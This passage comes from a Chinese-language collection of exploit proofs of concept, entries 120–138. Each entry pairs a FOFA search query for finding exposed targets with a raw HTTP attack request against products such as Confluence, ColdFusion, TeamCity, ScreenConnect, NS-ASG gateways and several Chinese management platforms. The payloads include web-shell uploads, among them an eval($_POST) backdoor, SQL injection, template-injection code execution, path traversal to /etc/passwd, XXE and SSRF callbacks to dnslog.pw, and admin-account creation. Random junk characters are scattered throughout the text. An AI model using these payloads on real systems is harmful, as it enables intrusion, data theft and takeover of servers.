% x. M& m; D A3 FSec-Fetch-Mode: cors* D, s& c8 F9 C8 ^
Sec-Fetch-Site: same-origin
6 ?0 J8 B/ |! d7 I: j" OX-Forwarded-For: 1.1.1.1
! G' o6 @! |" xX-Originating-Ip: 1.1.1.1
, Y: m+ c* A+ s, [& dX-Remote-Ip: 1.1.1.1) E1 L# [- |+ v
X-Remote-Addr: 1.1.1.1! }( a1 g" M4 D
Te: trailers
# g8 u2 T9 t1 O& n6 QConnection: close. V1 }2 N2 g# c! L( z
0 T! ~( b2 ]/ _/ Q
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456- o( X) o( V( Y5 m* T
& J" i( o+ u+ u8 q7 X$ E: z
, F n( F1 ?, X2 i
120. 北京百绰智能S40管理平台导入web.php任意文件上传. c5 b! S( k3 r+ `" k2 d
CVE-2024-1253/ Z8 M/ u2 r6 D& a( @
FOFA:title="Smart管理平台"
$ L: Z z7 ^" ?* K# R& _: ^9 wPOST /useratte/web.php? HTTP/1.1; \( L2 h6 [! l, P% U- _! t3 f6 {
Host: ip:port+ _4 z2 r1 [! W# ?8 f
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
3 v' z* X0 \) Y- @/ EUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
1 h" S/ p6 j# y2 E6 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 Q( z$ ~% J! E0 ^2 ]. IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ M: O# A2 b3 z( N, o4 k, g. e
Accept-Encoding: gzip, deflate+ S5 M+ t- e& w( ?
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793288 z" K! a) m9 ~, i [( z
Content-Length: 597" q2 g! P0 F6 V" ^/ m& k6 y. m
Origin: https://ip:port
2 ]& w+ W/ L6 f% p5 I5 tReferer: https://ip:port/sysmanage/licence.php
- d9 X+ o# p. G ~4 _Upgrade-Insecure-Requests: 1, i/ M5 G: }" Y, I, e0 d
Sec-Fetch-Dest: document
# R* A5 M3 q- Y7 c9 P8 H4 zSec-Fetch-Mode: navigate4 }( ~' _1 g, X
Sec-Fetch-Site: same-origin) C' q+ w. H! S% M
Sec-Fetch-User: ?1
9 C, r* ~9 |. h8 P$ o2 @ ETe: trailers5 a9 G; P$ W3 h9 k
Connection: close. q: l# J' t" d4 D% ]
. Q9 W7 L/ m/ o& d, j-----------------------------42328904123665875270630079328
, M2 }6 f _/ gContent-Disposition: form-data; name="file_upload"; filename="2.php"1 e' l% S: A# E
Content-Type: application/octet-stream
0 \, o) M/ p5 Y) V: S ~( T7 S) Q& Q9 v' [
<?php phpinfo()?>) o% Y* U' c' q. @: o
-----------------------------42328904123665875270630079328/ |/ F! r$ V, a" v, {/ S, x: U
Content-Disposition: form-data; name="id_type"& s$ _, j% e e& ]; l
?1 E6 c4 d9 W1' C) [2 m; b0 Y/ t; i
-----------------------------42328904123665875270630079328
- P- F! A! D, w$ M* d( }% CContent-Disposition: form-data; name="1_ck"
; e0 ^! K* s; I# w9 N' l$ W3 o3 W+ V7 v6 C! m2 @ V. Q
1_radhttp1 h" H4 @+ {: [( {) l6 |* C- `
-----------------------------42328904123665875270630079328
7 V: ~/ d2 i, W7 G. }% AContent-Disposition: form-data; name="mode"
: R: x9 V3 P$ h& ?& b8 ^* [
. |- f6 b" g2 E Q6 s) }import! f( b& \, e; m, Z8 U8 y1 Z3 {% \
-----------------------------42328904123665875270630079328
( ]! U/ y. S! {. i: a* q# w0 o$ }( Q# B! z
* J$ S9 O2 r* ^" `( b6 t& Y( O* Y
文件路径/upload/2.php
4 i N" W- g; k; m: x' S( O, a
. f0 b1 s/ A. P$ K121. 北京百绰智能S42管理平台userattestation.php任意文件上传
* z( X0 G, U8 o& G5 Q, r+ rCVE-2024-1918& e# k6 q$ q W2 n* l4 Q1 k4 [4 x
FOFA:title="Smart管理平台"1 c& o" {% _% Q5 c, t. M
POST /useratte/userattestation.php HTTP/1.1- w/ c$ {6 I& j5 o( _" }
Host: 192.168.40.130:8443; Z# R& x! z' J1 g/ y4 f5 \
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac501 K* o; t2 V) r) {! l6 G0 N& V
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" q6 V2 l' F! h" _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& j$ P6 r& Z. V* t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 {2 q5 O: U& Z$ p: k: r) W" PAccept-Encoding: gzip, deflate9 F) o6 c( C7 W- }* [+ ^
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 o h3 u3 u& Y
Content-Length: 592$ D5 j6 J5 ?0 D; C2 J* T7 A
Origin: https://192.168.40.130:8443' y h; Y$ f4 _ i- c: Y
Upgrade-Insecure-Requests: 1. c- Z( Q1 q+ ?4 F3 C: |
Sec-Fetch-Dest: document4 O/ V% K) y; r& @5 o' C
Sec-Fetch-Mode: navigate" S6 H9 I' j* ] Z" ?. E
Sec-Fetch-Site: same-origin" ^$ S& g! S4 w$ C& x% U. l
Sec-Fetch-User: ?1
3 H7 U- U, K+ n9 nTe: trailers
: D# J g3 Q8 F: q" `Connection: close6 f, j" B" E/ I; H* O3 u; C0 m% ~
% u9 c) B5 T0 s. q& L! L-----------------------------42328904123665875270630079328. A( j2 m: c- H8 j6 u' Y
Content-Disposition: form-data; name="web_img"; filename="1.php"
+ F7 S8 Y; x; m1 eContent-Type: application/octet-stream
( X2 q7 k& t. }! P+ V9 c+ m: j5 ?
<?php phpinfo();?>
5 I H. l9 n: }1 R) _-----------------------------42328904123665875270630079328) l3 N p6 T4 a2 G! Y
Content-Disposition: form-data; name="id_type"* V" {- S5 I) ~# ] N" L5 F. h
$ j {/ _; L, d% w! g! p
11 R& ]$ x% U$ F9 P
-----------------------------42328904123665875270630079328 V$ F& _5 S$ _
Content-Disposition: form-data; name="1_ck"" F m8 p, k. V" C( P. i( @
9 |+ i- m3 Q: T, d0 ]0 V1_radhttp
9 r r9 G8 r1 F$ z; {-----------------------------42328904123665875270630079328- p: b3 Q, l" w9 [2 N
Content-Disposition: form-data; name="hidwel"
( G+ H4 Q7 _' _& F$ [/ ^2 ]6 W7 O7 u8 S- F
set) {( a" W& e! Q2 d3 t% w
-----------------------------42328904123665875270630079328& K" Y3 K4 y! B. w* c* c5 A v
7 q" _/ s6 g+ L* t4 B
# V/ U) c0 ^+ |' \" U- n7 U7 z( Tboot/web/upload/weblogo/1.php( m, ], E) ?3 U) |! x) M
) H8 T' p& r9 \8 X- t/ w) j9 a
122. 北京百绰智能s200管理平台/importexport.php sql注入* _9 `$ B( B9 k5 g5 c N$ z% X
CVE-2024-27718FOFA:title="Smart管理平台"
) q# w( S0 `. m6 {8 }其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()3 }6 K5 l1 x+ c; F
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1( M3 q3 F4 Y( s" v5 l# u1 w1 C
Host: x.x.x.x/ b% h, \6 v: s/ ^' i5 C
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
" p7 u: A3 g2 `2 D' g% I5 x, pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" A. f2 M( X; s7 N! w# x% {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: C5 B' ?8 T' o6 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; t5 {& v$ d' N0 p1 H' k% z
Accept-Encoding: gzip, deflate, br
. x7 d5 C. a6 l8 t) SUpgrade-Insecure-Requests: 1
) K. `( C0 c" x% v6 P1 z8 C( M1 ASec-Fetch-Dest: document
5 h/ a1 `7 l/ R YSec-Fetch-Mode: navigate3 ? y, S% L) z$ y- Q8 n4 N3 P& V
Sec-Fetch-Site: none
" e! u5 E! d' i# V, R6 d% oSec-Fetch-User: ?1& [; s6 c7 w+ n. g, p5 ?3 k
Te: trailers
" {& C1 [, h& x9 \+ FConnection: close
+ |+ h- q" a0 ~; h7 H: v* B/ u$ h7 L) C1 n7 U& L) a
" z b8 t6 X2 ^7 b
123. Atlassian Confluence 模板注入代码执行
% L* [/ x7 K pFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
) g* L8 k& D9 N7 f4 C D6 [POST /template/aui/text-inline.vm HTTP/1.1
- I; Y; R/ P7 H- D9 g% }; o1 ]# ZHost: localhost:8090
$ q1 \/ V4 H6 s: M2 ZAccept-Encoding: gzip, deflate, br
: U. S$ w+ \' \# @Accept: */*7 l, P& u, f2 S- z+ T+ A3 C
Accept-Language: en-US;q=0.9,en;q=0.8
) j2 P E) x9 n4 W" ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36* o/ N3 A" B, I$ ]1 o
Connection: close
' C: |6 S' }* r9 I' b4 {9 ZContent-Type: application/x-www-form-urlencoded. A+ X; f! a7 C+ i' p9 P$ G
2 C: n# q% ?" u! _label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
4 P! i, B9 \' [, M, _2 c
2 L1 j4 N1 C" D
6 e& M6 f8 y- G' R8 S z' d2 c6 P124. 湖南建研工程质量检测系统任意文件上传+ Q" d0 }- @4 R$ e# P4 B6 X
FOFA:body="/Content/Theme/Standard/webSite/login.css"
/ T8 G- F& ~: d1 F; |" n6 d; APOST /Scripts/admintool?type=updatefile HTTP/1.15 g9 y2 H6 Y' N& d! W7 F
Host: 192.168.40.130:8282
2 N& j. V3 H/ ~) uUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.367 L9 O! e7 l% g3 U% c2 [
Content-Length: 721 G7 d `$ S6 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, [" y4 B( L# ~; u
Accept-Encoding: gzip, deflate, br3 `7 Y8 e+ I8 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! i; F3 W; }, o. v* l/ G5 j; `
Connection: close5 c' @& a9 i4 p$ e' `1 U/ t M9 S
Content-Type: application/x-www-form-urlencoded6 N. h. i* \! y* O
- o$ d8 F3 o! Z' o( n* D8 OfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>3 E" k) H. Y/ u/ L
% e' k0 e: n' {5 o/ |$ U: |4 w% i6 D v$ `9 [0 l4 t
http://192.168.40.130:8282/Scripts/abcgcg.aspx% k/ R* {/ ]2 p- d7 H. e
* Z' v0 m& V N1 D) }125. ConnectWise ScreenConnect身份验证绕过2 d' r- l8 E+ d$ m; p8 b
CVE-2024-1709: D7 W) A; B6 Z9 z. N# V- J6 L
FOFA:icon_hash="-82958153"4 x; ?- n- @! F6 R& ]
https://github.com/watchtowrlabs ... bypass-add-user-poc( N' ]5 S. q2 V. S- V
7 [' _- O6 n- U4 C
- l" n5 z& a( Z使用方法
$ x) ~- _2 @8 T! {( D# j' U& Ypython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!/ S( i' d6 w5 p: I1 Y+ l
0 L1 {3 `, Z% j W, A
" D- ~; @3 }/ `- p u0 a
创建好用户后直接登录后台,可以执行系统命令。
- M0 I- I7 C2 S& Y. i) X7 T8 B1 q2 k# ?3 `& M- I% G. b) w
126. Aiohttp 路径遍历" z, f$ ^+ ~0 d/ W
FOFA:title=="ComfyUI"
4 d9 ? a0 p0 `8 `) S3 lGET /static/../../../../../etc/passwd HTTP/1.1
t' r- ?2 H2 s; }7 P1 T8 T: C( HHost: x.x.x.x4 ~$ Z3 k9 @4 e' }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" ]1 m) d! o) ^/ s7 a2 A+ o' ZConnection: close N0 a. l, b/ n6 ^
Accept: */*
% P5 h1 m# u- ], f1 \8 s$ k" SAccept-Language: en
# W' W5 Q+ V7 V+ x: }4 eAccept-Encoding: gzip; I% J* s5 ]: o7 H) _" b {5 f
, m+ O$ Q; C6 y* r" [
3 B9 U; @! a. h* m4 v& E J. k127. 广联达Linkworks DataExchange.ashx XXE
( b* ^* p( s* e" V, [$ w, i, vFOFA:body="Services/Identification/login.ashx"
# Y) N+ \3 M2 W" e" GPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1 ~/ w. f) ~1 L: |. ]& c
Host: 192.168.40.130:8888
( p* e! J+ F1 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
2 c% W. B! |+ l' y* g4 hContent-Length: 415
8 ?$ H- z1 Y3 P- rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ }% `4 J# ^+ uAccept-Encoding: gzip, deflate( T9 Q3 R: |9 s \& G
Accept-Language: zh-CN,zh;q=0.9- }4 \, e8 c% H5 R
Connection: close
6 j0 }; {2 [4 m2 YContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
3 ]$ Q& [- c, }! B! u- B4 j4 X$ P5 uPurpose: prefetch
+ o1 \3 q3 G7 T, W7 qSec-Purpose: prefetch;prerender1 v& A6 n3 n' A5 P# c0 \ ]
1 h/ T& E* T/ |% W------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 o, u6 n* a' Q& a1 d0 t: HContent-Disposition: form-data;name="SystemName"( D7 L6 k( N3 J3 t2 P% f
! v$ C; a3 s( p9 qBIM- {( g/ D) j, I# q( n1 @. O7 D, S6 w
------WebKitFormBoundaryJGgV5l5ta05yAIe0- j [; k: f/ L. ? g) z% u# y
Content-Disposition: form-data;name="Params"
/ s+ q1 v: |" B/ ~$ M4 W& E+ V8 YContent-Type: text/plain" v" c' M! M9 D4 q, z& V }
+ }& i4 D3 |" B: _
<?xml version="1.0" encoding="UTF-8"?>
^; I1 d2 `5 d9 q4 }<!DOCTYPE test [
0 }% _% j/ a# u7 L i+ V9 [6 r<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
C8 y& L' S! x]
; D! c4 M q6 l, c>. u5 {! j$ D) O* b8 |' [ R
<test>&t;</test>, C# w1 L$ M r
------WebKitFormBoundaryJGgV5l5ta05yAIe0--" z3 W/ v0 ?5 u! J0 N5 X: Y
- O; [/ h {* Z+ m2 V7 ^* b* t; o
0 a: p. K/ C6 E$ I8 F A/ [
& U+ R: S) b5 z' A128. Adobe ColdFusion 反序列化5 c7 |, V4 v" s# w
CVE-2023-38203
0 q7 _7 I) G' O8 C: e/ U0 OAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)& A( C& e# H% D( s$ r# N+ v
FOFA:app="Adobe-ColdFusion"
: k& R# m+ W: D7 h; s# kPAYLOAD
0 m D& F: P% r4 V$ t0 _: E
$ X" D! ]- D5 n5 X# n; p8 H- D* Q129. Adobe ColdFusion 任意文件读取 H. n0 z* p; m5 n8 N2 Z' o' A
CVE-2024-20767
e* l- Y& F0 v% S5 \7 KFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"5 ?3 ^1 ~4 b1 j' v9 j! p/ `# z
第一步,获取uuid
/ b# Z# H$ ~1 `. EGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.17 a- c# o+ Y8 r5 C& J; x
Host: x.x.x.x* S5 u* k7 L6 u+ T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 P( @/ b6 h+ v
Accept: */*1 D; ^/ X! y/ |$ u! A
Accept-Encoding: gzip, deflate5 U$ g' e4 Z1 |. p9 B2 g
Connection: close
9 i4 X+ z4 O: I/ y
5 E% S0 [: w4 E7 ]9 w
% n$ X0 a7 P; i2 T: F4 H u第二步,读取/etc/passwd文件
5 R w3 L* k0 a; ?& ?, p! wGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
' h/ r3 J5 Z6 V( _3 P! s1 u- p5 K# zHost: x.x.x.x$ C0 z! ]/ ^' }# R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& Y( y0 ?. A! L! g3 @. DAccept: */*/ S; d! @- H3 |( _$ l, B0 }. p
Accept-Encoding: gzip, deflate2 A7 f! u# N/ Y
Connection: close; _ x" f1 {9 g: _0 j! Q
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
8 c. S w: k' r( z: O! `- {
" u2 w9 o# J0 x# e2 \+ U; b7 }5 [! E, b" b! X! ^4 M1 M6 K
130. Laykefu客服系统任意文件上传
]. ~8 }$ C, d/ hFOFA:icon_hash="-334624619"8 H! c* L6 c0 J) g, Y( Q5 W; E
POST /admin/users/upavatar.html HTTP/1.1
* @0 ?1 s& m0 S* W3 P3 `Host: 127.0.0.1
5 U5 J7 r1 A9 Z" W' j% sAccept: application/json, text/javascript, */*; q=0.01
/ j. h* \% Y5 \( j7 Z k: F; S; zX-Requested-With: XMLHttpRequest/ q) m1 ~6 D7 }" R: ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
5 e/ f% f* E3 u4 e. o9 xContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR. T7 B* a. H2 K; p" _
Accept-Encoding: gzip, deflate/ }) ]0 v7 x% \
Accept-Language: zh-CN,zh;q=0.9, d7 _+ n9 Z( V* Q3 ^
Cookie: user_name=1; user_id=3
1 o: u# i, I2 y4 |) B. ~; M& @% B# }Connection: close: S' j( U8 y, N7 P2 w$ s
- O+ I4 |" l$ c9 f
------WebKitFormBoundary3OCVBiwBVsNuB2kR( ^! I7 Q7 Z7 f6 m" e8 j7 R
Content-Disposition: form-data; name="file"; filename="1.php"3 `# C8 n$ L* f' ~# D; F8 c
Content-Type: image/png
" T8 r8 y( t+ v/ q$ f
. B- |" l5 {, H: ?* I" N<?php phpinfo();@eval($_POST['sec']);?>( ^8 h' s, @: S/ j' E/ T
------WebKitFormBoundary3OCVBiwBVsNuB2kR--# B4 B" U8 ?" ~! {6 h
) t( d. z: T V1 {
; r7 H- ~6 H5 [+ b- z3 i131. Mini-Tmall <=20231017 SQL注入' w3 W5 Z0 z7 d8 [# l& Y
FOFA:icon_hash="-2087517259"
! E7 o2 p1 U, q; C后台地址:http://localhost:8080/tmall/admin
: D' y) F. l* a; P6 Vhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
- {/ d. ^7 y% M1 s9 m
0 f' |6 Z$ ]" T2 c& C132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
6 Y/ ^- N D% G BCVE-2024-27198: ^, U# B6 e( O
FOFA:body="Log in to TeamCity"
1 T# Z0 U( P0 F" _0 d' BPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
4 o* k9 y0 P$ H) ~/ G6 X7 `2 gHost: 192.168.40.130:8111
5 o; U; m4 }5 L. e7 ]5 y! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) t5 i6 t/ e1 z/ R1 ^Accept: */*# Q; E; a5 N8 {# t
Content-Type: application/json; s' K8 O) Q" p
Accept-Encoding: gzip, deflate
0 E( y3 W( M+ d( V
8 G- t1 [5 O- n2 z& {{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
. P0 W% _8 p# ~) o3 }; R+ `' y5 Y2 V6 |! U1 D
: }0 h- T7 f" W/ x: Y
CVE-2024-27199
0 h* h8 \, o& q \" u/res/../admin/diagnostic.jsp
' E* z0 t( I* W/.well-known/acme-challenge/../../admin/diagnostic.jsp; y# _0 u$ `3 t o J
/update/../admin/diagnostic.jsp- D# N# @0 j( N$ s4 }6 L1 y% l4 E/ T
: l3 H0 m" s& s4 D5 H H; Y
) W0 B* f! V; I2 T0 i- c" }9 CCVE-2024-27198-RCE.py
3 \3 v! _0 K' w# O4 ~/ }! d! a1 q$ m# ^- f1 H+ V
133. H5 云商城 file.php 文件上传
: J2 K7 q k! d0 }: a* dFOFA:body="/public/qbsp.php"
* V2 S. F: M% ]' m0 o. UPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
% U8 P# m' s0 |* wHost: your-ip7 r3 `5 Y5 `" @" H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ Y5 K( V0 T' AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx% ^9 B* T* p1 ], f2 j4 C( w
" p' s6 H/ K& j* q# r
------WebKitFormBoundaryFQqYtrIWb8iBxUCx7 r$ V- _1 V9 }) p
Content-Disposition: form-data; name="file"; filename="rce.php"
( W* X( j* A/ ^5 e& sContent-Type: application/octet-stream
3 z! r# L' G9 q- x7 A % y6 i4 r( ^! Z
<?php system("cat /etc/passwd");unlink(__FILE__);?>
% R% f* F! P3 W------WebKitFormBoundaryFQqYtrIWb8iBxUCx--; N: h. X9 t% e# Z/ Y
& C/ I' q# K' |7 N* t
% Y q% U; Q' L) m. R4 M- R+ P2 m- u6 x p1 a2 d
134. 网康NS-ASG应用安全网关index.php sql注入: e9 } U; C/ B) a
CVE-2024-2330
- z* W, ~9 U7 N9 z; m; TNetentsec NS-ASG Application Security Gateway 6.3版本
, i# R. \) [/ ^4 n. E# ?+ G, jFOFA:app="网康科技-NS-ASG安全网关"5 e( S0 Q+ y/ @ q
POST /protocol/index.php HTTP/1.1
) {, |; B8 _" g) {Host: x.x.x.x; C. {' J( j+ b8 a# f7 k5 a! k
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de. K- s* E3 u5 c. d5 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.04 @( f* V* s/ A+ S# h0 m+ w, E* T
Accept: */*7 }0 D: C7 o/ t# |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( o* V/ ?; U- q1 V zAccept-Encoding: gzip, deflate( \/ g! }* x) l3 b9 w4 X
Sec-Fetch-Dest: empty/ m$ x% d( y& u7 j# \' Q' n# a* z
Sec-Fetch-Mode: cors
: {& u: q$ B; [% j3 D/ NSec-Fetch-Site: same-origin' `. c u6 w( w/ f8 h
Te: trailers
& q2 s& z* |2 I% `3 N w( YConnection: close4 H, U$ K% o; w6 [! k
Content-Type: application/x-www-form-urlencoded# B) `8 k' O/ K& a
Content-Length: 263
8 p! a- `# Y& @$ G! x
2 j/ K m, `! G2 m* {/ b# L# ujsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
( J. x' N5 ?, _9 q- r% B- O- f$ M& j6 R) Q
- t' O8 g0 q- c
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 P1 D8 H' F9 E) ICVE-2024-2022
' N0 R$ r4 u1 H4 aNetentsec NS-ASG Application Security Gateway 6.3版本
. z1 E# r5 c/ b6 h V/ }. eFOFA:app="网康科技-NS-ASG安全网关"% }; e5 E3 b$ e5 A
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
$ t' [6 U0 D) s$ {Host: x.x.x.x
) I G3 V7 W2 V& OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. M/ p# Y# w. R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 j1 G( W9 a& Z- V+ YAccept-Encoding: gzip, deflate
4 S! k5 E* ]4 L0 B- ]" VAccept-Language: zh-CN,zh;q=0.9
% [( X5 Y; c/ F+ ]; E. g1 `9 MConnection: close
2 N, T( U) }% m. j# I* G( T' f: s3 L; y* \- y5 f
; d; B( ?4 q+ W136. NextChat cors SSRF: ~4 G+ @8 ?" g# q& @+ B" Z
CVE-2023-49785
$ U# T% F$ g- j% C! `1 o2 Q# c9 E# eFOFA:title="NextChat"
7 j% d' G7 L- b1 S' _8 zGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
: ~+ s# }9 c; D" L' C" L" Q. lHost: x.x.x.x:10000: m! k7 x5 c% Z+ ^; D" M) }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& A1 U( P9 N- J8 B0 F! M) w6 `Connection: close2 ^6 }1 L" f3 C+ E. Z6 [1 D! ~6 b
Accept: */*0 y" c3 U9 \$ f7 t8 z7 C5 r
Accept-Language: en
, O/ r% j: L8 ^8 @+ u6 VAccept-Encoding: gzip
5 J7 @" k# [; z' H' n
' A, ~: s* V2 ?# |( w3 a. q
$ \# m9 }( [$ I& N" U5 y1 s9 [2 F137. 福建科立迅通信指挥调度平台down_file.php sql注入3 E1 s5 k/ j# `) m3 c) \( b
CVE-2024-2620( O# k. N) {; s# Q
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, x+ B, O; e' q( [GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
, y/ r& V/ z7 }/ ]- UHost: x.x.x.x# @1 U$ d/ K8 @' a; ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' P. @8 r, h3 K% ~% ?2 n* }$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* f0 U1 e& t% \2 E2 ~2 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: X1 d# i- C( w$ [- P
Accept-Encoding: gzip, deflate, br
' |/ t W" q: I% ?! ?1 _Connection: close
( U8 r4 R4 M; T: @Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj- o6 G. }/ s% v9 k0 n6 z
Upgrade-Insecure-Requests: 10 {' \" t) V \1 V/ T1 H1 b
: v: e0 ~' k' K9 e& Z0 n2 Y8 j* n2 _
0 \" o6 W$ j0 d6 r3 n/ `
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& |8 Q$ r' p* \, l; M, vCVE-2024-26219 g& z) ~7 D$ Q) Y) I
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 B5 L7 I) f" A8 n4 i; {2 tGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
$ G3 i A' B9 b/ ]' q1 v( aHost: x.x.x.x
: W7 E# r, o9 }) z. S6 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. b1 l c0 u. P. I! u3 D! g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. g2 ]2 g n7 \8 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 L4 h3 H9 I+ O: W# U& h; ?
Accept-Encoding: gzip, deflate, br/ A3 f% k3 K ^4 r; X
Connection: close
3 z0 J# y; Z' n( iUpgrade-Insecure-Requests: 1
: }3 T% ~/ P0 f% b( R I8 m8 X M; l& \' D/ P
3 p) t; @' ^0 f
